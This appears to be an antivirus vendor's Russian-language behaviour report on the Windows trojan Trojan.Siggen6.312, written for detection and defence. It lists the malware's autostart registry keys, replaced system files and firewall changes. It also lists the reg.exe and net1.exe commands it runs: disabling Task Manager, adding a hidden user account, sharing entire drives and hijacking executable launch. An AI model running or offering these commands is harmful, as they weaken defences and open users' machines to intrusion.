Trojan.Siggen6.312

Техническая информация

Для обеспечения автозапуска и распространения:

Модифицирует следующие ключи реестра:

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AutoCosn' = '%WINDIR%\rundll32.exe'
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'svchostTerm' = '%WINDIR%\svhchost.exe'

Подменяет следующие исполняемые системные файлы:

<SYSTEM32>\dllcache\rundll32.exe файлом <SYSTEM32>\dllcache\rundll32.exe.new
<SYSTEM32>\rundll32.exe файлом <SYSTEM32>\rundll32.exe.new

Заражает следующие исполняемые файлы:

<SYSTEM32>\dllcache\rundll32.exe.new

Вредоносные функции:

Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:

[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DisableNotifications' = '00000001'

Для затруднения выявления своего присутствия в системе

блокирует запуск следующих системных утилит:

Диспетчера задач (Taskmgr)

Запускает на исполнение:

'<SYSTEM32>\net1.exe' add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t REG_DWORD /d 1 /f
'<SYSTEM32>\net1.exe' add HKLM\ControlPanel\International /v SLongDate /t REG_SZ /d ? /f
'<SYSTEM32>\reg.exe' /pid=3928
'<SYSTEM32>\reg.exe' /pid=3896
'<SYSTEM32>\net1.exe' /pid=3792
'<SYSTEM32>\net1.exe' /pid=3752
'<SYSTEM32>\reg.exe' add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d %WINDIR%\telnet.exe %1 %* /f
'<SYSTEM32>\reg.exe' /pid=3776
'<SYSTEM32>\net1.exe' /pid=3768
'<SYSTEM32>\reg.exe' /pid=3944
'<SYSTEM32>\reg.exe' /pid=284
'<SYSTEM32>\reg.exe' /pid=300
'<SYSTEM32>\reg.exe' /pid=2260
'<SYSTEM32>\reg.exe' /pid=2196
'<SYSTEM32>\reg.exe' /pid=268
'<SYSTEM32>\reg.exe' /pid=4040
'<SYSTEM32>\reg.exe' /pid=4024
'<SYSTEM32>\reg.exe' /pid=312
'<SYSTEM32>\reg.exe' /pid=4064
'<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t REG_DWORD /d 1 /f
'<SYSTEM32>\net1.exe' share 3$=E:\ /unlimited
'<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v DisableNotifications /t REG_DWORD /d 1 /f
'<SYSTEM32>\net1.exe' share 4$=F:\ /unlimited
'<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
'<SYSTEM32>\net1.exe' localgroup %USERNAME%s UNIQ /add
'<SYSTEM32>\net1.exe' user UNIQ /add
'<SYSTEM32>\net1.exe' share 2$=<Имя диска съемного носителя>:\ /unlimited
'<SYSTEM32>\net1.exe' share 1$=C:\ /unlimited
'<SYSTEM32>\net1.exe' share 5$=G:\ /unlimited
'<SYSTEM32>\reg.exe' add HKLM\ControlPanel\International /v sNativeDigits /t REG_SZ /d ? /f
'<SYSTEM32>\reg.exe' add HKLM\ControlPanel\International /v sTimeFormat /t REG_SZ /d ? /f
'<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AutoCosn /t REG_SZ /d %WINDIR%\rundll32.exe /f
'<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchostTerm /t REG_SZ /d %WINDIR%\svhchost.exe /f
'<SYSTEM32>\reg.exe' add HKLM\ControlPanel\International /v sShortDate /t REG_SZ /d ? /f
'<SYSTEM32>\reg.exe' add HKLM\ControlPanel\International /v s1159 /t REG_S /d ? /f
'<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v DoNotAllowExceptions /t REG_DWORD /d 1 /f
'<SYSTEM32>\reg.exe' add HKLM\ControlPanel\International /v SLongDate /t REG_SZ /d ? /f
'<SYSTEM32>\reg.exe' add HKLM\ControlPanel\International /v s2359 /t REG_SZ /d ? /f